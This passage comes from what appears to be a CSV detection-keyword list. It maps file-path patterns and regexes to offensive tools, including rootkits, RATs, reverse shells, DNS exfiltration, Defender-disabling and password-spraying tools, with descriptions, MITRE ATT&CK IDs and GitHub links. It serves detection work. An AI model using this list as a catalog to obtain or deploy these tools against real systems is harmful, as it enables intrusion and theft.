respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Desktop\FakeText.lnk*",".{0,1000}\\Desktop\\FakeText\.lnk.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. 
appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\Development\GOLD-BACKDOOR\*",".{0,1000}\\Development\\GOLD\-BACKDOOR\\.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\dfscoerce.py*",".{0,1000}\\dfscoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\diamorphine.c*",".{0,1000}\\diamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*\diamorphine.h*",".{0,1000}\\diamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" 
"*\DigitalOceanProxyTab.java*",".{0,1000}\\DigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*\DInjector.sln*",".{0,1000}\\DInjector\.sln.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*\DInjector\*",".{0,1000}\\DInjector\\.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*\dirbuster.py*",".{0,1000}\\dirbuster\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\dircreate2system.pdb*",".{0,1000}\\dircreate2system\.pdb.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*\dircreate2system.sln*",".{0,1000}dircreate2system\.sln.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*\DirCreate2System\bin\*",".{0,1000}\\DirCreate2System\\bin\\.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*\disableav.bat*",".{0,1000}\\disableav\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\DisableWD.7z*",".{0,1000}\\DisableWD\.7z.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*\DisableWD.dll,*",".{0,1000}\\DisableWD\.dll,.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of 
capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\DiscordTokenExfilterater.cs*",".{0,1000}\\DiscordTokenExfilterater\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\dist\sigthief.exe*",".{0,1000}\\dist\\sigthief\.exe.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*\dkmc.py*",".{0,1000}\\dkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*\DLHell.py*",".{0,1000}\\DLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*\DLHell-main\*",".{0,1000}\\DLHell\-main\\.{0,1000}","offensive_tool_keyword","DLHell","Local & remote 
Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*\DLL_Hijacking.*",".{0,1000}\\DLL_Hijacking\..{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*\dllexploit.cpp*",".{0,1000}\\dllexploit\.cpp.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\dllexploit.exe*",".{0,1000}\\dllexploit\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\DllExport.bat*",".{0,1000}\\DllExport\.bat.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\DllExport.bat*",".{0,1000}\\DllExport\.bat.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\dll-hijack-by-proxying*",".{0,1000}\\dll\-hijack\-by\-proxying.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*\dll-hijack-by-proxying-master*",".{0,1000}\\dll\-hijack\-by\-proxying\-master.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*\dllinjection_rs.exe*",".{0,1000}\\dllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\dllproxy.nim*",".{0,1000}\\dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" 
"*\dll-sideload\main.cpp*",".{0,1000}\\dll\-sideload\\main\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*\DllVoidFunction.txt*",".{0,1000}\\DllVoidFunction\.txt.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\dns2tcp\*",".{0,1000}\\dns2tcp\\.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*\dns2tcp\server*",".{0,1000}\\dns2tcp\\server.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*\dns2tcp-0.*",".{0,1000}\\dns2tcp\-0\..{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*\dnscan.py*",".{0,1000}\\dnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain 
scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*\dns-cat.exe*",".{0,1000}\\dns\-cat\.exe.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*\dnschef.exe*",".{0,1000}\\dnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnschef.ini*",".{0,1000}\\dnschef\.ini.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnschef.log*",".{0,1000}\\dnschef\.log.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnschef.py*",".{0,1000}\\dnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnschef-ng\*",".{0,1000}\\dnschef\-ng\\.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. 
A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnscrypt-proxy*",".{0,1000}\\dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*\dnsdump.py*",".{0,1000}\\dnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. 
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*\DnSpoof.ps1*",".{0,1000}\\DnSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\dnsrecon.py*",".{0,1000}\\dnsrecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\dnsrecon-subdomain-bruteforce.py*",".{0,1000}\\dnsrecon\-subdomain\-bruteforce\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\dnsstager.py*",".{0,1000}\\dnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project 
based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*\dns-zone-transfer.py*",".{0,1000}\\dns\-zone\-transfer\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\DocsPLZ.cpp*",".{0,1000}\\DocsPLZ\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\DocsPLZ.exe*",".{0,1000}\\DocsPLZ\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\Do-Exfiltration.ps1*",".{0,1000}\\Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\DoHC2.cs*",".{0,1000}\\DoHC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\domain_admins.txt*",".{0,1000}\\domain_admins\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\DomainGPPPassword.cs*",".{0,1000}\\DomainGPPPassword\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\DomainPasswordSpray\*",".{0,1000}\\DomainPasswordSpray\\.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*\DomainPasswordSpray-master*",".{0,1000}\\DomainPasswordSpray\-master.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*\DomainRecon\*.txt",".{0,1000}\\DomainRecon\\.{0,1000}\.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\domcachedump.py*",".{0,1000}\\domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\donut.exe*",".{0,1000}\\donut\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*\donut\VanillaProgram.bin*",".{0,1000}\\donut\\VanillaProgram\.bin.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\Doraemon*",".{0,1000}\\Doraemon.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - 